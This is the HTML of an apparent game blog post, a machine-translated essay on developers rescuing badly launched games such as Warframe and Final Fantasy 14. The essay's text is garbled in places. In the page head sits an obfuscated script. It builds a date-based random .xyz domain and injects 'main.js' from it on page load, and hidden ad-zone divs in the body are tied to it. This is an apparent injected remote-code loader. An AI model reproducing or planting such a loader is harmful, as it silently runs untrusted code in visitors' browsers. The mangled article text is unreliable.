<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Nowadays, there are countless types and styles of video games. There are many excellent works, and there are more unsatisfactory works. However, there are many works that gradually become a good one t">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Can players accept the game manufacturer&#39;s mending the past">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Nowadays, there are countless types and styles of video games. There are many excellent works, and there are more unsatisfactory works. However, there are many works that gradually become a good one t">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/9a00320e24294250a252666abb764fa4.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/1315830f4bd643cfa55b03778765b365.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/0ad55694b27940a8b44104ae0c325ddf.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/e522203c800f4ac0bc593856bfa76423.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/c57f80ee8b1a459e8a4744c1b4698b80.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/85e084c0feb7416294d97761534773ba.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/73e33df518d94ad0b3695ade118b07b6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/04b79ae3567d43d4a795d8c4bb361232.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Can players accept the game manufacturer&#39;s mending the past">
<meta name="twitter:description" content="Nowadays, there are countless types and styles of video games. There are many excellent works, and there are more unsatisfactory works. However, there are many works that gradually become a good one t">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/9a00320e24294250a252666abb764fa4.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Can players accept the game manufacturer's mending the past | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Can players accept the game manufacturer's mending the past</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Nowadays, there are countless types and styles of video games. There are many excellent works, and there are more unsatisfactory works. However, there are many works that gradually become a good one through updating and modifying because of the poor quality of the game at the beginning. This situation usually means that many works fail at the beginning, and game manufacturers attempt to recover the reputation and quality of the game through these remedies. After all, for large factories, if the game has no reputation, it means that they cannot create revenue, and especially for many large factories, no one wants to see their hard-made products do not earn money.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/9a00320e24294250a252666abb764fa4.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>With the passage of time, this kind of situation happens more and more often. It always gives people a feeling of “they are all good in collusion”. As time goes on, it will not be surprising. Let’s think about it from another angle. If there are still so many similar situations under the condition of having learned from the past, then what is the reason? And players are willing to accept the developers every time “know what’s wrong and change it”?</p>
<h1 id="helpless-move"><a href="#helpless-move" class="headerlink" title="helpless move"></a>helpless move</h1><p>In my impression, the first successful case of “saltfish turning over” should be the action shooting game “warframe” launched by digital extremes (DE), a Canadian developer. The original “warframe” only has three battle armours and a few maps for players to play, but for a free online game, it seems that the head is not well opened. In its early years, de was mainly responsible for undertaking various outsourcing projects and developing other games for many first-line manufacturers. The studio’s earliest achievements can be traced back to the last century’s “virtual arena” series. With the passage of time, the development technology of the game is becoming more and more demanding, and De is constantly expanding its scale in order to better complete the task. In the hearts of several core members of the studio, they have been thinking that one day they can make a large-scale original work of their own. In order to realize the whole dream, they have tried many times, but failed in the end It ended.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/1315830f4bd643cfa55b03778765b365.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>However, with the business of the studio becoming more and more sluggish and the special “humanistic care” of Canadians, even though the company has almost been unable to make ends meet, it will not actively dismiss any employees. They will integrate the only resources in their hands and decide to make a game to save the miserable situation of the studio. If the game still fails, then The studio is likely to be completely dissolved.<br>And this game is warframe. The reason why the first version of the game is so low is that their ability can only achieve this level at that time, and many aspects of the design are also very immature. At the beginning of the online game, many people have criticized the game, but people can see clearly that this game has a good foundation and great potential, so they decided to give Support. With the help of the players, “warframe” can have today’s huge scale and good reputation. It can be said that this road is not the one that De is willing to choose, they just have no choice but to do so.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/0ad55694b27940a8b44104ae0c325ddf.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"></p>
<p>#A cavity of hot blood<br>When it comes to “saltfish turning over”, how can we not mention the famous name of “Final Fantasy 14” (ff14 for short), “square Enix” (Se for short), the developer of FF series, is also a front-line manufacturer in the circle, holding many world-class well-known IPS? For such a company, it is certainly not necessary to worry about money, even if the game is done in general, it can also Rely on hard technology to save a bit of public praise. But who can think that even with such superior conditions, Se can still make a “garbage” to smash its own signboard. “Ff14” is the second online game in the history of the series, and the quality of the previous generation’s works is pretty good and still insists on operation until today. Perhaps for se at that time, the “Final Fantasy” series was the “ceiling” of Japanese games at that time, in terms of technology The ability to do the best, or even just that, is enough for players to volunteer to pay.<br>Driven by this concept, Se developed ff14 online game in a 3A single player mode. Due to the confusion of concepts, the game is neither like a single player nor an online game. In addition to the screen, it is useless and does not consider the configuration of players in terms of optimization. As a result, the first version of the game has no gameplay. It is not so much an online game as an online game A demonstration product for se to show muscle.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/e522203c800f4ac0bc593856bfa76423.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>Se is like a child who doesn’t know what to do. Only when he has really suffered a loss can he learn a lesson. “Ff14” has been hit by Waterloo online. Many fans can’t help but cry out to be cheated when they see the game like this. Several core members who once led the team to develop the game just quit the farce after apologizing. In se, Yoshida, who is the next door producer of “the brave fight the dragon”, took over the mess.<br>Yoshida likes FF series very much. He has a chance to take over the development he is working on, but he didn’t expect it to be like this. He doesn’t want to see the IP die slowly. He wants to make the series fresh again. So he decides to make a new game to replace the existing version. Throughout the history of the game, the only game that can do this is ff14. Now, the word-of-mouth of ff14 is not only the highest in the series, but also its influence is gradually expanding. All this is due to Yoshida’s love for this work. They are not short of money, they are only short of enthusiasm for these works.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/c57f80ee8b1a459e8a4744c1b4698b80.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"></p>
<h1 id="experimental-products"><a href="#experimental-products" class="headerlink" title="experimental products"></a>experimental products</h1><p>There are two online games on the top, but there are some differences on the bottom. I don’t know if you have found out that many big factories like to launch various “service-oriented Games” nowadays. They sell 3A price of the game and promise that there will be continuous updates after the game goes online, so that players can always have new things to play. In this way, they can not only get profits from the game sale, but also maintain the stickiness of the players through the update, so as to sell various kinds of clothes Decorative props and service projects to long-term profitability. Usually these games will announce the future update plan of the game at the beginning of sale as a gimmick to publicize the game. In most cases, these updates do not have accurate date and detailed content, and often only have one concept and one name, but actually to the extreme of the update, they are delayed again and again. In this regard, to a large extent, it is the table after the sale of the game Now related. Such as EA’s “hymn” and Bethesda’s “radiation 76” and other works, these games are full of gimmicks in the early stage of the sale, attracting the attention of players with shocking trailers, but when the game is sold, it is found that it is another scene.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/85e084c0feb7416294d97761534773ba.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>For these first-line manufacturers, they also don’t need to worry about money. Why do they want to publicize and make great efforts to emphasize the future update plan? Because they know what the first version of these games looks like. After all, these manufacturers have had successful works before, and they know better and worse than anyone, And the birth of these games is often a flash of inspiration or have been put on hold of the idea of useless, by the “service-oriented game” boom to do a rub heat.<br>The more self-confident you are about your game, the more you will emphasize which parts of the game are excellent. The development cycle of these games is much shorter than the players think. Blow the cow out first, and slowly add in the missing content after the game is sold. If the market reaction is not good, you can even give up the operation of the game. For a few manufacturers with bad reputation, the update will definitely be more. It’s just a matter of time. After all, they have to rely on their reputation to eat. And some people just can let go of this face, and you can’t do anything about it even if you don’t do it. What about you, ff15.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/73e33df518d94ad0b3695ade118b07b6.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>    concluding remarks<br>Since talking about this topic, many people may wonder how they can not talk about “no one in deep space”? Because the situation of “no one in deep space” is quite special, because he is the combination of “warframe” and “ff14” in the above, the producers have a dream to enjoy the universe, and also hope to try their best to return to the Haikou they once boasted, and they have experienced the flood during the development period, resulting in the loss of data, even if the reputation of the game is poor, the reputation of the studio is still poor Adhere to the game updates, and are free. Don’t forget that they are still an independent game development team, which is absolutely impossible for many front-line manufacturers.<br><img src="http://maiygu.xyz/2019/11/08/Can players accept the game manufacturer's mending the past/04b79ae3567d43d4a795d8c4bb361232.jpg" alt="Can players accept the game manufacturer&#39;s mending the past"><br>Now, the quality of “no one in deep space” is enough to make people forget the “scam” he once caused. On the other hand, if the first-line manufacturers fail to achieve the expected results in the first game and internal purchase, and where the motivation continues to provide long-term free updates for the game, perhaps in their view, this is a kind of behavior of “no effort, no favor”. Most of the time, the players don’t care when the game is updated or how much it can be updated, but they care about the attitude of the development team towards their own works. Only with their loyalty to the players and enthusiasm for the game, will there be a piece of Nirvana reborn works. For those who see unprofitable works and try to give up, they will eventually bear a bad reputation and be forgotten In the long river of time.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/" rel="next" title="Count the players in the game world! It's more terrible than boss. The worst one is in the novice village">
                <i class="fa fa-chevron-left"></i> Count the players in the game world! It's more terrible than boss. The worst one is in the novice village
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Blizzard is not the only CG factory players are talking about/" rel="prev" title="Blizzard is not the only CG factory players are talking about">
                Blizzard is not the only CG factory players are talking about <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#helpless-move"><span class="nav-number">1.</span> <span class="nav-text">helpless move</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#experimental-products"><span class="nav-number">2.</span> <span class="nav-text">experimental products</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
